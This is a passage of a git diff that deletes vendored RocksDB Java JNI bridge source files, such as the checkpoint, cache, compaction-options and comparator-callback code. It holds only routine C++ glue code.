-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Checkpoint methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_Checkpoint.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/checkpoint.h"
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    newCheckpoint
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Checkpoint_newCheckpoint(JNIEnv* env,
-    jclass jclazz, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Checkpoint* checkpoint;
-  rocksdb::Checkpoint::Create(db, &checkpoint);
-  return reinterpret_cast<jlong>(checkpoint);
-}
-
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    dispose
- * Signature: (J)V
- */
-void Java_org_rocksdb_Checkpoint_disposeInternal(JNIEnv* env, jobject jobj,
-    jlong jhandle) {
-  auto* checkpoint = reinterpret_cast<rocksdb::Checkpoint*>(jhandle);
-  assert(checkpoint != nullptr);
-  delete checkpoint;
-}
-
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    createCheckpoint
- * Signature: (JLjava/lang/String;)V
- */
-void Java_org_rocksdb_Checkpoint_createCheckpoint(
-    JNIEnv* env, jobject jobj, jlong jcheckpoint_handle,
-    jstring jcheckpoint_path) {
-  const char* checkpoint_path = env->GetStringUTFChars(
-      jcheckpoint_path, 0);
-  if(checkpoint_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* checkpoint = reinterpret_cast<rocksdb::Checkpoint*>(
-      jcheckpoint_handle);
-  rocksdb::Status s = checkpoint->CreateCheckpoint(
-      checkpoint_path);
-  
-  env->ReleaseStringUTFChars(jcheckpoint_path, checkpoint_path);
-  
-  if (!s.ok()) {
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/clock_cache.cc b/thirdparty/rocksdb/java/rocksjni/clock_cache.cc
deleted file mode 100644
index 0a4d7b2..0000000
--- a/thirdparty/rocksdb/java/rocksjni/clock_cache.cc
+++ /dev/null
@@ -1,40 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::ClockCache.
-
-#include <jni.h>
-
-#include "cache/clock_cache.h"
-#include "include/org_rocksdb_ClockCache.h"
-
-/*
- * Class:     org_rocksdb_ClockCache
- * Method:    newClockCache
- * Signature: (JIZ)J
- */
-jlong Java_org_rocksdb_ClockCache_newClockCache(
-    JNIEnv* env, jclass jcls, jlong jcapacity, jint jnum_shard_bits,
-    jboolean jstrict_capacity_limit) {
-  auto* sptr_clock_cache =
-      new std::shared_ptr<rocksdb::Cache>(rocksdb::NewClockCache(
-          static_cast<size_t>(jcapacity),
-          static_cast<int>(jnum_shard_bits),
-          static_cast<bool>(jstrict_capacity_limit)));
-  return reinterpret_cast<jlong>(sptr_clock_cache);
-}
-
-/*
- * Class:     org_rocksdb_ClockCache
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ClockCache_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_clock_cache =
-      reinterpret_cast<std::shared_ptr<rocksdb::Cache> *>(jhandle);
-  delete sptr_clock_cache;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc b/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc
deleted file mode 100644
index 6e40a7e..0000000
--- a/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-
-#include "include/org_rocksdb_ColumnFamilyHandle.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_ColumnFamilyHandle
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyHandle_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cfh = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(handle);
-  assert(cfh != nullptr);
-  delete cfh;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc b/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc
deleted file mode 100644
index 72de46b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionFilter.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_AbstractCompactionFilter.h"
-#include "rocksdb/compaction_filter.h"
-
-// <editor-fold desc="org.rocksdb.AbstractCompactionFilter">
-
-/*
- * Class:     org_rocksdb_AbstractCompactionFilter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractCompactionFilter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cf = reinterpret_cast<rocksdb::CompactionFilter*>(handle);
-  assert(cf != nullptr);
-  delete cf;
-}
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc b/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc
deleted file mode 100644
index ef04d81..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionOptionsFIFO.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompactionOptionsFIFO.h"
-#include "rocksdb/advanced_options.h"
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    newCompactionOptionsFIFO
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompactionOptionsFIFO_newCompactionOptionsFIFO(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompactionOptionsFIFO();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    setMaxTableFilesSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_CompactionOptionsFIFO_setMaxTableFilesSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-  opt->max_table_files_size = static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    maxTableFilesSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_CompactionOptionsFIFO_maxTableFilesSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-  return static_cast<jlong>(opt->max_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompactionOptionsFIFO_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc b/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc
deleted file mode 100644
index d397db8..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc
+++ /dev/null
@@ -1,194 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionOptionsUniversal.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompactionOptionsUniversal.h"
-#include "rocksdb/advanced_options.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    newCompactionOptionsUniversal
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompactionOptionsUniversal_newCompactionOptionsUniversal(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompactionOptionsUniversal();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jsize_ratio) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->size_ratio = static_cast<unsigned int>(jsize_ratio);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    sizeRatio
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_sizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMinMergeWidth
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMinMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmin_merge_width) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->min_merge_width = static_cast<unsigned int>(jmin_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    minMergeWidth
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_minMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->min_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMaxMergeWidth
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMaxMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_merge_width) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->max_merge_width = static_cast<unsigned int>(jmax_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    maxMergeWidth
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_maxMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->max_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMaxSizeAmplificationPercent
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMaxSizeAmplificationPercent(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_size_amplification_percent) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->max_size_amplification_percent =
-      static_cast<unsigned int>(jmax_size_amplification_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    maxSizeAmplificationPercent
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_maxSizeAmplificationPercent(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->max_size_amplification_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setCompressionSizePercent
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setCompressionSizePercent(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jcompression_size_percent) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->compression_size_percent =
-      static_cast<unsigned int>(jcompression_size_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    compressionSizePercent
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_compressionSizePercent(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->compression_size_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setStopStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setStopStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jstop_style_value) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->stop_style =
-      rocksdb::CompactionStopStyleJni::toCppCompactionStopStyle(
-          jstop_style_value); 
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    stopStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_CompactionOptionsUniversal_stopStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return rocksdb::CompactionStopStyleJni::toJavaCompactionStopStyle(
-      opt->stop_style);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setAllowTrivialMove
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setAllowTrivialMove(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_trivial_move) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->allow_trivial_move = static_cast<bool>(jallow_trivial_move);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    allowTrivialMove
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_CompactionOptionsUniversal_allowTrivialMove(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return opt->allow_trivial_move;
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/comparator.cc b/thirdparty/rocksdb/java/rocksjni/comparator.cc
deleted file mode 100644
index 5955d0b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparator.cc
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <functional>
-
-#include "include/org_rocksdb_AbstractComparator.h"
-#include "include/org_rocksdb_Comparator.h"
-#include "include/org_rocksdb_DirectComparator.h"
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-
-// <editor-fold desc="org.rocksdb.AbstractComparator>
-
-/*
- * Class:     org_rocksdb_AbstractComparator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractComparator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* bcjc = reinterpret_cast<rocksdb::BaseComparatorJniCallback*>(handle);
-  assert(bcjc != nullptr);
-  delete bcjc;
-}
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.Comparator>
-
-/*
- * Class:     org_rocksdb_Comparator
- * Method:    createNewComparator0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Comparator_createNewComparator0(
-    JNIEnv* env, jobject jobj, jlong copt_handle) {
-  const rocksdb::ComparatorJniCallbackOptions* copt =
-    reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(copt_handle);
-  const rocksdb::ComparatorJniCallback* c =
-    new rocksdb::ComparatorJniCallback(env, jobj, copt);
-  return reinterpret_cast<jlong>(c);
-}
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.DirectComparator>
-
-/*
- * Class:     org_rocksdb_DirectComparator
- * Method:    createNewDirectComparator0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_DirectComparator_createNewDirectComparator0(
-    JNIEnv* env, jobject jobj, jlong copt_handle) {
-  const rocksdb::ComparatorJniCallbackOptions* copt =
-    reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(copt_handle);
-  const rocksdb::DirectComparatorJniCallback* c =
-    new rocksdb::DirectComparatorJniCallback(env, jobj, copt);
-  return reinterpret_cast<jlong>(c);
-}
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc
deleted file mode 100644
index 73ab46a..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc
+++ /dev/null
@@ -1,366 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-
-namespace rocksdb {
-BaseComparatorJniCallback::BaseComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt)
-    : mtx_compare(new port::Mutex(copt->use_adaptive_mutex)),
-    mtx_findShortestSeparator(new port::Mutex(copt->use_adaptive_mutex)) {
-  // Note: Comparator methods may be accessed by multiple threads,
-  // so we ref the jvm not the env
-  const jint rs = env->GetJavaVM(&m_jvm);
-  if(rs != JNI_OK) {
-    // exception thrown
-    return;
-  }
-
-  // Note: we want to access the Java Comparator instance
-  // across multiple method calls, so we create a global ref
-  assert(jComparator != nullptr);
-  m_jComparator = env->NewGlobalRef(jComparator);
-  if(m_jComparator == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  // Note: The name of a Comparator will not change during it's lifetime,
-  // so we cache it in a global var
-  jmethodID jNameMethodId = AbstractComparatorJni::getNameMethodId(env);
-  if(jNameMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-  jstring jsName = (jstring)env->CallObjectMethod(m_jComparator, jNameMethodId);
-  if(env->ExceptionCheck()) {
-    // exception thrown
-    return;
-  }
-  jboolean has_exception = JNI_FALSE;
-  m_name = JniUtil::copyString(env, jsName,
-      &has_exception);  // also releases jsName
-  if (has_exception == JNI_TRUE) {
-    // exception thrown
-    return;
-  }
-
-  m_jCompareMethodId = AbstractComparatorJni::getCompareMethodId(env);
-  if(m_jCompareMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  m_jFindShortestSeparatorMethodId =
-    AbstractComparatorJni::getFindShortestSeparatorMethodId(env);
-  if(m_jFindShortestSeparatorMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  m_jFindShortSuccessorMethodId =
-    AbstractComparatorJni::getFindShortSuccessorMethodId(env);
-  if(m_jFindShortSuccessorMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-}
-
-const char* BaseComparatorJniCallback::Name() const {
-  return m_name.c_str();
-}
-
-int BaseComparatorJniCallback::Compare(const Slice& a, const Slice& b) const {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  // TODO(adamretter): slice objects can potentially be cached using thread
-  // local variables to avoid locking. Could make this configurable depending on
-  // performance.
-  mtx_compare->Lock();
-
-  bool pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceA, &a, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return 0;
-  }
-
-  pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceB, &b, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return 0;
-  }
-  
-  jint result =
-    env->CallIntMethod(m_jComparator, m_jCompareMethodId, m_jSliceA,
-      m_jSliceB);
-
-  mtx_compare->Unlock();
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallIntMethod
-    env->ExceptionDescribe(); // print out exception to stderr
-    result = 0; // we could not get a result from java callback so use 0
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-
-  return result;
-}
-
-void BaseComparatorJniCallback::FindShortestSeparator(
-  std::string* start, const Slice& limit) const {
-  if (start == nullptr) {
-    return;
-  }
-
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  const char* startUtf = start->c_str();
-  jstring jsStart = env->NewStringUTF(startUtf);
-  if(jsStart == nullptr) {
-    // unable to construct string
-    if(env->ExceptionCheck()) {
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsStart);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  // TODO(adamretter): slice object can potentially be cached using thread local
-  // variable to avoid locking. Could make this configurable depending on
-  // performance.
-  mtx_findShortestSeparator->Lock();
-
-  bool pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceLimit, &limit, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    if(jsStart != nullptr) {
-      env->DeleteLocalRef(jsStart);
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  jstring jsResultStart =
-    (jstring)env->CallObjectMethod(m_jComparator,
-      m_jFindShortestSeparatorMethodId, jsStart, m_jSliceLimit);
-
-  mtx_findShortestSeparator->Unlock();
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallObjectMethod
-    env->ExceptionDescribe();  // print out exception to stderr
-    env->DeleteLocalRef(jsStart);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  env->DeleteLocalRef(jsStart);
-
-  if (jsResultStart != nullptr) {
-    // update start with result
-    jboolean has_exception = JNI_FALSE;
-    std::string result = JniUtil::copyString(env, jsResultStart,
-        &has_exception);  // also releases jsResultStart
-    if (has_exception == JNI_TRUE) {
-      if (env->ExceptionCheck()) {
-        env->ExceptionDescribe();  // print out exception to stderr
-      }
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    *start = result;
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-void BaseComparatorJniCallback::FindShortSuccessor(std::string* key) const {
-  if (key == nullptr) {
-    return;
-  }
-
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  const char* keyUtf = key->c_str();
-  jstring jsKey = env->NewStringUTF(keyUtf);
-  if(jsKey == nullptr) {
-    // unable to construct string
-    if(env->ExceptionCheck()) {
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  } else if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsKey);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  jstring jsResultKey =
-    (jstring)env->CallObjectMethod(m_jComparator,
-      m_jFindShortSuccessorMethodId, jsKey);
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallObjectMethod
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsKey);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  env->DeleteLocalRef(jsKey);
-
-  if (jsResultKey != nullptr) {
-    // updates key with result, also releases jsResultKey.
-    jboolean has_exception = JNI_FALSE;
-    std::string result = JniUtil::copyString(env, jsResultKey, &has_exception);
-    if (has_exception == JNI_TRUE) {
-      if (env->ExceptionCheck()) {
-        env->ExceptionDescribe();  // print out exception to stderr
-      }
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    *key = result;
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-BaseComparatorJniCallback::~BaseComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jComparator != nullptr) {
-    env->DeleteGlobalRef(m_jComparator);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-ComparatorJniCallback::ComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt) :
-    BaseComparatorJniCallback(env, jComparator, copt) {
-  m_jSliceA = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceA == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceB = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceB == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceLimit = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceLimit == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-ComparatorJniCallback::~ComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jSliceA != nullptr) {
-    env->DeleteGlobalRef(m_jSliceA);
-  }
-
-  if(m_jSliceB != nullptr) {
-    env->DeleteGlobalRef(m_jSliceB);
-  }
-
-  if(m_jSliceLimit != nullptr) {
-    env->DeleteGlobalRef(m_jSliceLimit);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-DirectComparatorJniCallback::DirectComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt) :
-    BaseComparatorJniCallback(env, jComparator, copt) {
-  m_jSliceA = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceA == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceB = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceB == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceLimit = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceLimit == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-DirectComparatorJniCallback::~DirectComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jSliceA != nullptr) {
-    env->DeleteGlobalRef(m_jSliceA);
-  }
-
-  if(m_jSliceB != nullptr) {
-    env->DeleteGlobalRef(m_jSliceB);
-  }
-
-  if(m_jSliceLimit != nullptr) {
-    env->DeleteGlobalRef(m_jSliceLimit);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h b/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h
deleted file mode 100644
index a753008..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h
